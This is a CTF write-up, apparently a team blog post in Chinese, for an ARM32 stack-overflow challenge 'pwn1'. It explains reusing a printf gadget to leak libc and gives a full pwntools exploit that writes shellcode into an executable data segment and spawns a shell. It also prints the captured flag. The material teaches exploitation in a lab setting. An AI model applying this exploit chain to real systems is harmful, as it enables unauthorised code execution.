[Pwn] pwn1 - cpt.shao xp0int Posted on Apr 29 2021 arm32简单栈溢出,就是找gadget花了点时间。搜索不到可以设置r0的gadget。 观察到`0x104d8`是程序已有的printf逻辑 ``` .text:000104D0 LDR R3, =(aInput - 0x104DC) ; "input: " .text:000104D4 ADD R3, PC, R3 ; "input: " .text:000104D8 MOV R0, R3 ; format .text:000104DC BL printf .text:000104E0 SUB R3, R11, #-buf .text:000104E4 MOV R2, #0x300 ; nbytes .text:000104E8 MOV R1, R3 ; buf .text:000104EC MOV R0, #0 ; fd .text:000104F0 BL read .text:000104F4 MOV R3, #0 .text:000104F8 MOV R0, R3 .text:000104FC SUB SP, R11, #4 .text:00010500 POP {R11,PC} ``` 这里printf是从r3获取参数的,然后我们可以搜到一条设置r3的gadget,0x10348:pop {r3, pc}。 将r3设置为got地址,然后跳到上面`104d8`的地方就可以泄露libc,同时进行下一次read。注意执行过后还可以把sp迁移到其他位置。观察vmmap发现程序data段竟然是rwx的。所以做法就是设置好read的地址,指向data段0x21000的地方,发送shellcode,然后read结束之后再直接跳data段就可以执行shellcode了。 ```python # flag{AoCiUtzYFsh4KhLXdiTATxEvKx} from pwn import * import re context.terminal = ['tmux', 'splitw', '-h'] context.endian = "little" context.arch = 'arm' env = {'LD_PRELOAD': ''} context.log_level = "debug" if len(sys.argv) == 1: p = process('') elif len(sys.argv) == 3: p = remote(sys.argv[1], sys.argv[2]) gdbcmd = "set $BSS=0x606020\n" # set addr variable here to easily access in gdb # 0x555555554000 se = lambda data :p.send(data) sa = lambda delim,data :p.sendafter(delim, data) sl = lambda data :p.sendline(data) sla = lambda delim,data :p.sendlineafter(delim, data) sea = lambda delim,data :p.sendafter(delim, data) rc = lambda numb=4096 :p.recv(numb) ru = lambda delims, drop=True :p.recvuntil(delims, drop) uu32 = lambda data :u32(data.ljust(4, '\0')) uu64 = lambda data :u64(data.ljust(8, '\0')) info_addr = lambda tag, addr :p.info(tag + ': {:#x}'.format(addr)) # gdb.attach(p, gdbcmd) rop = "" rop += p32(0x10348) # pop r3, pc rop += p32(0x2100c) # got rop += p32(0x104d8) sla("input: ", cyclic(256) + p32(0x21000+260) + rop) leak = uu32(rc(4)) info_addr("leak", leak) libc = leak - 0x3d39c info_addr("libc", libc) rop = "" rop += p32(0x21000) sc = asm("mov r0, r0;\n"*0x10 + shellcraft.linux.sh()) print(hexdump(sc)) sl(sc.ljust(0x100) + p32(0) + p32(0x21000)) p.interactive() ``` 打赏还是打残,这是个问题 赏 Wechat Pay Alipay [Reverse] PE - Cew [Pwn] harmoshell2 - cpt.shao
没有帐号? 立即注册